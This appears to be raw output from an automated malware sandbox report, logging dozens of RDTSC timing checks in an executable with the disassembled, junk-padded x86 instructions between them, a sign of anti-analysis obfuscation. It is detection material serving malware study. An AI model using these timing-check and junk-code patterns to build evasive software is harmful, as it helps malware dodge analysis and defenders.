                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB153 second address: DEB15E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F91E851B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB420 second address: DEB426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB426 second address: DEB431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB431 second address: DEB450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91E8D54024h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB572 second address: DEB58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E851B8E6h 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB58C second address: DEB596 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB596 second address: DEB5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F91E851B8DEh 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEB74E second address: DEB752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEC2BC second address: DEC2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEC2C2 second address: DEC2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEC449 second address: DEC465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F91E851B8D6h 0x00000009 jmp 00007F91E851B8E1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF0A15 second address: DF0A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF0A19 second address: DF0A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F91E851B8E2h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF0A40 second address: DF0A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF0A4E second address: DF0A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jmp 00007F91E851B8DCh 0x00000010 jmp 00007F91E851B8E4h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007F91E851B8ECh 0x00000020 push eax 0x00000021 push edx 0x00000022 jns 00007F91E851B8D6h 0x00000028 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DEF14D second address: DEF15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF1E64 second address: DF1E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jng 00007F91E851B8D6h 0x0000000c pop edx 0x0000000d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF1E71 second address: DF1E76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF1E76 second address: DF1EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91E851B8E5h 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F91E851B8D6h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF1EA2 second address: DF1EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DBDAAA second address: DBDAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFA621 second address: DFA640 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91E8D54022h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b je 00007F91E8D5401Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF9A85 second address: DF9A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E4h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF9C21 second address: DF9C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF9C25 second address: DF9C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF9C30 second address: DF9C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DF9DA9 second address: DF9DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFA1F4 second address: DFA1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFA1FA second address: DFA1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFC86F second address: DFC875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFCA6C second address: DFCA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E9h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFCB51 second address: DFCB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFCB55 second address: DFCB5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD175 second address: DFD179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD179 second address: DFD17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD3CD second address: DFD3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD3D3 second address: DFD3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91E851B8DAh 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD5F5 second address: DFD5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD5FF second address: DFD618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD6CE second address: DFD6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD6D2 second address: DFD6F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2919h], esi 0x0000000e mov edi, dword ptr [ebp+122D33B5h] 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 js 00007F91E851B8D6h 0x0000001d jo 00007F91E851B8D6h 0x00000023 popad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFD6F9 second address: DFD6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFE4F5 second address: DFE4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFE4F9 second address: DFE585 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91E8D54016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F91E8D54018h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 and edi, 4FCE66D7h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D287Ch], ebx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F91E8D54018h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jmp 00007F91E8D54029h 0x00000057 xchg eax, ebx 0x00000058 jmp 00007F91E8D5401Eh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 push edx 0x00000062 pop edx 0x00000063 pop esi 0x00000064 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFF72C second address: DFF730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFF730 second address: DFF736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0215C second address: E02195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E851B8DDh 0x00000008 jmp 00007F91E851B8E9h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnp 00007F91E851B8D6h 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E02195 second address: E021A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F91E8D54016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E047AF second address: E047D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8DEh 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E047D1 second address: E047D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E07F9E second address: E07FBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E07FBA second address: E08004 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F91E8D54018h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 or ebx, dword ptr [ebp+122D381Fh] 0x0000002a push 00000000h 0x0000002c jmp 00007F91E8D5401Ah 0x00000031 xchg eax, esi 0x00000032 push esi 0x00000033 jl 00007F91E8D5401Ch 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E09E82 second address: E09E9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E09E9E second address: E09EA8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91E8D5401Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E09EA8 second address: E09F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91E851B8DEh 0x0000000d pop edx 0x0000000e nop 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F91E851B8D8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov bl, ah 0x00000030 or bx, 56DFh 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F91E851B8D8h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov ebx, dword ptr [ebp+122D39EFh] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b jmp 00007F91E851B8E0h 0x00000060 pop edi 0x00000061 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0C13F second address: E0C158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0C158 second address: E0C15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0D1D6 second address: E0D1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0E234 second address: E0E239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0E239 second address: E0E2CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F91E8D54022h 0x00000010 jmp 00007F91E8D5401Ch 0x00000015 nop 0x00000016 jmp 00007F91E8D54028h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F91E8D54018h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov dword ptr [ebp+1245306Fh], edx 0x0000003d push 00000000h 0x0000003f and bx, D99Fh 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 jmp 00007F91E8D54025h 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e jne 00007F91E8D54016h 0x00000054 popad 0x00000055 popad 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0E2CB second address: E0E2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0E2D2 second address: E0E2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0F123 second address: E0F154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E1h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F91E851B8E6h 0x00000014 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0F154 second address: E0F15A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E10205 second address: E10210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F91E851B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E01E86 second address: E01E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1421C second address: E14220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E14220 second address: E1424A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F91E8D5401Eh 0x00000011 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E162AB second address: E162B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E162B0 second address: E162B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1B38D second address: E1B392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1B392 second address: E1B398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1B398 second address: E1B3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F91E851B8D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1F847 second address: E1F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1F84B second address: E1F851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1F851 second address: E1F867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E8D54020h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E1F867 second address: E1F884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F91E851B8EEh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E24DBC second address: E24DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E24FCE second address: E25024 instructions: 0x00000000 rdtsc 0x00000002 je 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F91E851B8DAh 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jg 00007F91E851B8EFh 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F91E851B8DCh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jns 00007F91E851B8D6h 0x00000031 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E25024 second address: E25028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2A7EE second address: E2A7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2A7F4 second address: E2A831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54026h 0x00000007 jo 00007F91E8D54016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F91E8D54027h 0x00000015 jmp 00007F91E8D54021h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2A831 second address: E2A84D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F91E851B8E2h 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2A84D second address: E2A870 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91E8D5401Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91E8D54023h 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2A870 second address: E2A874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2A9A8 second address: E2A9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
